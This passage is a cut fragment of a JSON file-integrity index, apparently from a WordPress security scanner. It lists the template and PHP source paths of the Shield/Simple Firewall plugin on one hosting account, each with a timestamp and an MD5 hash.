tes\\/twig\\/wizard\\/slides\\/ptg\\/finished.twig\":{\"d\":1567917025,\"h\":\"842c6981bf73bc0733283fefa97ea1bc\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wizard\\/slides\\/ptg\\/scanresult_plugins.twig\":{\"d\":1567917025,\"h\":\"c829dbac182804b4131c22461562c7b4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wizard\\/slides\\/common\\/no_access.twig\":{\"d\":1567917025,\"h\":\"c8e9436b0f0d469e75e7dd0968fa0765\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wizard\\/slides\\/common\\/base_start.twig\":{\"d\":1567917025,\"h\":\"15665705cd4f8e4e981141f247a00cd9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wizard\\/slides\\/common\\/base_finish.twig\":{\"d\":1567917025,\"h\":\"ff18de845fec425588eee08cdc0b9e7c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wizard\\/slides\\/common\\/security_admin_verify.twig\":{\"d\":1567917025,\"h\":\"bcb52a05c0105fba169f0834d18dce4f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wizard\\/slides\\/common\\/base.twig\":{\"d\":1567917025,\"h\":\"42ed9990c45d131c0fc31857f5fc7833\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wizard\\/slides\\/importexport\\/import.twig\":{\"d\":1567917025,\"h\":\"9f65b6a1d0476f482b458d817d5a6471\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wizard\\/slides\\/importexport\\/start.twig\":{\"d\":1567917025,\"h\":\"76b240bef1f9acfdaacc1212bae1f87c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wizard\\/slides\\/importexport\\/finished.twig\":{\"d\":1567917025,\"h\":\"4541444a5c1c21f9513dffe44ed31aff\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wizard\\/slides\\/mfa\\/authemail.twig\":{\"d\":1567917025,\"h\":\"98b8d57b76bb1e2ef80e98b192429ada\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wizard\\/slides\\/mfa\\/start.twig\":{\"d\":1567917025,\"h\":\"476e16684fb806d43ab69b8f07f600f5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wizard\\/slides\\/mfa\\/authga.twig\":{\"d\":1567917025,\"h\":\"93d243af26c6e3de598485bc351deb30\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wizard\\/slides\\/mfa\\/finished.twig\":{\"d\":1567917025,\"h\":\"48e42302b1cb7f1403d129e22dac6680\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wizard\\/slides\\/mfa\\/multiselect.twig\":{\"d\":1567917025,\"h\":\"bd5b9e85645f8f7f96a62e00668fb7a0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wizard\\/slides\\/ufc\\/config.twig\":{\"d\":1567917025,\"h\":\"2fec11431f9e69cc3f6ef18f2c52042b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wizard\\/slides\\/ufc\\/exclusions.twig\":{\"d\":1567917025,\"h\":\"68548fb4f532fdabb7c658f60764fa12\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wizard\\/slides\\/ufc\\/start.twig\":{\"d\":1567917025,\"h\":\"bf2a6c820e36a319bcaff00000d6ff91\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wizard\\/slides\\/ufc\\/finished.twig\":{\"d\":1567917025,\"h\":\"d3df022b790ff969d34e797df97680c8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wizard\\/slides\\/ufc\\/scanresult.twig\":{\"d\":1567917025,\"h\":\"93e2696daca84d574bc12acba472aab1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wizard\\/slides\\/gdpr\\/start.twig\":{\"d\":1567917025,\"h\":\"488bd6f0e9598f92735160ebb459c3ee\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wizard\\/slides\\/gdpr\\/finished.twig\":{\"d\":1567917025,\"h\":\"be12c84e4453e10583e496d319394a7b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wizard\\/slides\\/gdpr\\/results.twig\":{\"d\":1567917025,\"h\":\"a357f319bdb3a8cf457005eee356e3a5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wizard\\/slides\\/gdpr\\/search.twig\":{\"d\":1567917025,\"h\":\"cade08200ad1c53d56442877bcb9c96b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wizard\\/snippets\\/wizard_landing.twig\":{\"d\":1567917025,\"h\":\"7887589098bf26daf4e232d1b4a1f39c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/emails\\/user_management\\/user_login_notification.twig\":{\"d\":1567917025,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wpadmin_pages\\/insights\\/ips\\/ips_base.twig\":{\"d\":1567917025,\"h\":\"98e6cb0fdcc63eae5d94b96482e3df59\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wpadmin_pages\\/insights\\/ips\\/index.twig\":{\"d\":1567917025,\"h\":\"ed21ea70b7a1a0336ea2408781eeb840\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wpadmin_pages\\/insights\\/ips\\/ips_black.twig\":{\"d\":1567917025,\"h\":\"40cd92b0a34908091d3fbdf83181d910\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wpadmin_pages\\/insights\\/ips\\/ips_white.twig\":{\"d\":1567917025,\"h\":\"64aba4d5a3233638d4fa6fde2ad979a9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wpadmin_pages\\/insights\\/reports\\/index.twig\":{\"d\":1567917025,\"h\":\"0f637b0b8e58fd7e53fa4b81214f2c9e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wpadmin_pages\\/insights\\/audit\\/index.twig\":{\"d\":1567917025,\"h\":\"c196c5e85c674233b0b2cdd1c3af9244\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wpadmin_pages\\/insights\\/audit\\/audit_table.twig\":{\"d\":1567917025,\"h\":\"d263fef06eb009db12341c6896919a81\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wpadmin_pages\\/insights\\/settings\\/index.twig\":{\"d\":1567917025,\"h\":\"55555074af7ddd68ff5e321c1904b8ad\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wpadmin_pages\\/insights\\/original\\/notices.twig\":{\"d\":1567917025,\"h\":\"2e63fa17fe7a2092ef7bacc252103b43\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wpadmin_pages\\/insights\\/original\\/recent_events.twig\":{\"d\":1567917025,\"h\":\"7bc2c85038821910fdb3f6b4b1279547\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wpadmin_pages\\/insights\\/original\\/title.twig\":{\"d\":1567917025,\"h\":\"c71686ac85c0045a7fe7db852ddc2537\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wpadmin_pages\\/insights\\/original\\/audit_trail.twig\":{\"d\":1567917025,\"h\":\"43dc9ef35fa3dcaff6cd8f9f1d15b88d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wpadmin_pages\\/insights\\/original\\/index.twig\":{\"d\":1567917025,\"h\":\"6c154314885ddebeae4a88ebef6a7608\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wpadmin_pages\\/insights\\/original\\/stats.twig\":{\"d\":1567917025,\"h\":\"89f34d620d13a06829fb7c3e7c76e066\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wpadmin_pages\\/insights\\/original\\/mod_summary.twig\":{\"d\":1567917025,\"h\":\"aad4edd7dffda15339cffccc97203e65\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wpadmin_pages\\/insights\\/common\\/feature_unavailable.twig\":{\"d\":1567917025,\"h\":\"2b117b4bc0daf2e511c3b21e00e9ae10\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wpadmin_pages\\/insights\\/insights\\/notices.twig\":{\"d\":1567917025,\"h\":\"c2226a75fc5d8cb8c7afa8c553463735\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wpadmin_pages\\/insights\\/insights\\/recent_events.twig\":{\"d\":1567917025,\"h\":\"de4180f5d63d66d29cfe7de866cb3231\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wpadmin_pages\\/insights\\/insights\\/index.twig\":{\"d\":1567917025,\"h\":\"7ac1ea394465423f1f720379e0bee37f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wpadmin_pages\\/insights\\/insights\\/stats.twig\":{\"d\":1567917025,\"h\":\"5109a67235820e2e10a7746e41a57b32\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wpadmin_pages\\/insights\\/traffic\\/traffic_disabled.twig\":{\"d\":1567917025,\"h\":\"c044e96d75f7af8bec2f1b3bfe18e32b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wpadmin_pages\\/insights\\/traffic\\/index.twig\":{\"d\":1567917025,\"h\":\"c8343570f3a1d247656603f688c7f9e5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wpadmin_pages\\/insights\\/traffic\\/traffic_table.twig\":{\"d\":1567917025,\"h\":\"818766baf7208e758bf52d39356c3c55\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wpadmin_pages\\/insights\\/license\\/index.twig\":{\"d\":1567917025,\"h\":\"26cb316dfa1cbef471e63f67f5b521fa\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wpadmin_pages\\/insights\\/license\\/license.twig\":{\"d\":1567917025,\"h\":\"c3741220c0f0a8662a5f906693a63485\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wpadmin_pages\\/insights\\/importexport\\/index.twig\":{\"d\":1567917025,\"h\":\"f7f15e496970d661593f377fb2c7e2ed\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wpadmin_pages\\/insights\\/importexport\\/from_site.twig\":{\"d\":1567917025,\"h\":\"7319d262183dfb2d5649a5df4129e1a5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wpadmin_pages\\/insights\\/importexport\\/from_file.twig\":{\"d\":1567917025,\"h\":\"fedd771338581ac9ead8cbff3c8fc0d1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wpadmin_pages\\/insights\\/config\\/index.twig\":{\"d\":1567917025,\"h\":\"2b027199ffc131c112f84c0f93412594\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wpadmin_pages\\/insights\\/config\\/module_summaries.twig\":{\"d\":1567917025,\"h\":\"42bb6f4dc2a07be161af01e4ca53b83a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wpadmin_pages\\/insights\\/notes\\/index.twig\":{\"d\":1567917025,\"h\":\"238258e62cff473102a45f9c3d75a51e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wpadmin_pages\\/insights\\/notes\\/admin_notes.twig\":{\"d\":1567917025,\"h\":\"1c5f0daed383718b0e1b5919fa72b973\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wpadmin_pages\\/insights\\/scans\\/results\\/ptg_table.twig\":{\"d\":1567917025,\"h\":\"28fd35fd0fe5f361629b0f5a054a7e73\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wpadmin_pages\\/insights\\/scans\\/results\\/ufc.twig\":{\"d\":1567917025,\"h\":\"f8ac70096b014cf80c54be8cb6505fef\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wpadmin_pages\\/insights\\/scans\\/results\\/ptg.twig\":{\"d\":1567917025,\"h\":\"4a617afc06fdfde36d16c70b6c58d951\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wpadmin_pages\\/insights\\/scans\\/results\\/mal.twig\":{\"d\":1567917025,\"h\":\"3b7a68c511acf3cb9bb539a1f247d88d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wpadmin_pages\\/insights\\/scans\\/results\\/wpv.twig\":{\"d\":1567917025,\"h\":\"14cfa81cfaef917058b2d23ed6640b0f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wpadmin_pages\\/insights\\/scans\\/results\\/apc.twig\":{\"d\":1567917025,\"h\":\"85ccae7116bfbaa938fe2b0d4c1c54bb\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wpadmin_pages\\/insights\\/scans\\/results\\/ptg_unavailable.twig\":{\"d\":1567917025,\"h\":\"5a6e81bec32ef3437b18f4756a9d6fea\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wpadmin_pages\\/insights\\/scans\\/results\\/common_disabled.twig\":{\"d\":1567917025,\"h\":\"a5ff1a7ef6b0a70d6b8b9151eca31fed\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wpadmin_pages\\/insights\\/scans\\/results\\/wcf.twig\":{\"d\":1567917025,\"h\":\"29fb566a28047da006896c7da7804204\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wpadmin_pages\\/insights\\/scans\\/results\\/common_unavailable.twig\":{\"d\":1567917025,\"h\":\"b6fda1e3b4987d76f7289b5ab19d191f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wpadmin_pages\\/insights\\/scans\\/results\\/mal_disabled.twig\":{\"d\":1567917025,\"h\":\"a5ff1a7ef6b0a70d6b8b9151eca31fed\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wpadmin_pages\\/insights\\/scans\\/scan_areas.twig\":{\"d\":1567917025,\"h\":\"67b5b3d2414b28e407cb32bf79f03efb\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wpadmin_pages\\/insights\\/scans\\/index.twig\":{\"d\":1567917025,\"h\":\"7454652d195c6809f8a898626433eee1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wpadmin_pages\\/insights\\/scans\\/scan_results.twig\":{\"d\":1567917025,\"h\":\"482f2341ff2b5f895e732054520f8284\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wpadmin_pages\\/insights\\/scans\\/scan_start.twig\":{\"d\":1567917025,\"h\":\"4786273e40469fb59d776b6e9cfd220a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wpadmin_pages\\/insights\\/scans\\/modal_progress.twig\":{\"d\":1567917025,\"h\":\"af9f0ba6d99e66b7c6a1b9ca61afb9f0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wpadmin_pages\\/insights\\/scans\\/modal_progress_snippet.twig\":{\"d\":1567917025,\"h\":\"3efb9551594373aab4d72d13cb7aedf4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wpadmin_pages\\/insights\\/users\\/index.twig\":{\"d\":1567917025,\"h\":\"1a49b2d35d02aa3c4a17898cdb089d03\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wpadmin_pages\\/insights\\/users\\/sessions_table.twig\":{\"d\":1567917025,\"h\":\"df7e45bf1a246ed7625fcb15613c35c7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wpadmin_pages\\/insights\\/base.twig\":{\"d\":1567917025,\"h\":\"0c5bdf02ccea28d7844f30e75deadabc\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wpadmin_pages\\/base.twig\":{\"d\":1567917025,\"h\":\"0946f379b94e566c96b1e5fe7f18b6bc\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/flags\\/index.html\":{\"d\":1567917025,\"h\":\"71037c0a2dd48bf9b9b00cd71446b21c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/features\\/headers.php\":{\"d\":1567917025,\"h\":\"46d89c02a0ec72c19aa0b32da2a8f23c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/features\\/email.php\":{\"d\":1567917025,\"h\":\"a9b1d12403c0e1ecf8d10d8d983c52d7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/features\\/plugin.php\":{\"d\":1567917025,\"h\":\"1143afde2362892461d9ff3ed592b225\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/features\\/statistics.php\":{\"d\":1567917025,\"h\":\"cef74beeea41e48b1ec506e2930ce548\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/features\\/base_wpsf.php\":{\"d\":1567917025,\"h\":\"d9212b44056c89c56231510d3d611b0d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/features\\/admin_access_restriction.php\":{\"d\":1567917025,\"h\":\"91bf8386ff410512250d86545b1efbe6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/features\\/license.php\":{\"d\":1567917025,\"h\":\"89a425a301f4ea9b592c8dae059e3008\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/features\\/events.php\":{\"d\":1567917025,\"h\":\"98d6bdabe675903026b87c0112b3d454\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/features\\/insights.php\":{\"d\":1567917025,\"h\":\"5809f9739c046418a454e3068fdc5010\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/features\\/base.php\":{\"d\":1567917025,\"h\":\"1e4f4c67771aa91a7bca257405059245\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/features\\/ips.php\":{\"d\":1567917025,\"h\":\"000a4d78019614041377c5e3799b6d21\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/features\\/traffic.php\":{\"d\":1567917025,\"h\":\"1a3f8783d44359fa4e5879f325b53134\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/features\\/audit_trail.php\":{\"d\":1567917025,\"h\":\"79bb123bb0228df665bc6eee9c885a38\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/features\\/autoupdates.php\":{\"d\":1567917025,\"h\":\"6febbb996c05c020551a7dbb3989c6b7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/features\\/comments_filter.php\":{\"d\":1567917025,\"h\":\"1fe112fb7843565302c736b1011731bf\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/features\\/hack_protect.php\":{\"d\":1567917025,\"h\":\"443aa821b4e7902a6683b23ace7562f3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/features\\/lockdown.php\":{\"d\":1567917025,\"h\":\"cf909d8779569ff8a45d30bebd2ed3a7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/features\\/sessions.php\":{\"d\":1567917025,\"h\":\"686a9a73445aa33ce2f16316716d132c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/features\\/login_protect.php\":{\"d\":1567917025,\"h\":\"f7fed7764c5c3b47c9c9b9d2f07ecafa\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/features\\/user_management.php\":{\"d\":1567917025,\"h\":\"ba30c8338c1c84f45eaaa156179662da\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/features\\/firewall.php\":{\"d\":1567917025,\"h\":\"48dafc0c45ef37610875ba9ce551f6b4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/query\\/base\\/statistics_base.php\":{\"d\":1567917025,\"h\":\"96e88eb96b68e5131c0f4fafb0b48548\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/query\\/VOs\\/StatisticsReportingVO.php\":{\"d\":1567917025,\"h\":\"78f04449d6022119832daf0b846c5232\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/query\\/statistics\\/reporting.php\":{\"d\":1567917025,\"h\":\"9f47e01483ed92c2820d27a170ca5bf9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/query\\/statistics\\/consolidation.php\":{\"d\":1567917025,\"h\":\"3df5dfdf0cfea381747c2bdffeca7b1e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/loginprotect_gasp.php\":{\"d\":1567917025,\"h\":\"45929f491069584529bbf239e48dc57e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/hackprotect_scan_ptg.php\":{\"d\":1567917025,\"h\":\"24da851a283513dcf104f0e35c7c7b05\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/plugin_crondaily.php\":{\"d\":1567917025,\"h\":\"dc0489865c5de2e94bc739c0ed56fcf3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/plugin_badgewidget.php\":{\"d\":1567917025,\"h\":\"8620824ee2713a8991d21a1c78ce810d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/headers.php\":{\"d\":1567917025,\"h\":\"b1721efb55d79bc3c816b02454457fa5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/hackprotect_scanner.php\":{\"d\":1567917025,\"h\":\"c4fb6a23aad9e90f7a3e55005dbfd4a1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/loginprotect_cooldown.php\":{\"d\":1567917025,\"h\":\"2eef5dc7c28aa908097fa6c4fc9d0287\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/usermanagement_sessions.php\":{\"d\":1567917025,\"h\":\"7045e67b0358760aca1c4b6613032344\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/plugin_badge.php\":{\"d\":1567917025,\"h\":\"105f6f4365fd0bdc06219bc97b710470\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/commentsfilter_humanspam.php\":{\"d\":1567917025,\"h\":\"f2f40954860bd103bc9df844343a42a1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/hackprotect_scan_wpv.php\":{\"d\":1567917025,\"h\":\"29d5461e92c9f519b5556570a768f799\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/audit_trail_auditor_base.php\":{\"d\":1567917025,\"h\":\"2f70b02f8297688f8b054173b7a47f48\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/plugin_tracking.php\":{\"d\":1567917025,\"h\":\"c09128e106b72109928aea97f974a411\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/commentsfilter_googlerecaptcha.php\":{\"d\":1567917025,\"h\":\"8f4a341aa69b514e2c1465110626740b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/hackprotect_scan_assets_base.php\":{\"d\":1567917025,\"h\":\"934d08d5ea9cc7f98be7d906f8a2141f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/email.php\":{\"d\":1567917025,\"h\":\"b9382db4e902f7f7b99a7a487e6d260e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/processors\\/hackprotect_scan_ufc.php\":{\"d\":1567917025,\"h\":\"bf1cd972bd103e526bcc5d8f3d85f3d5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/p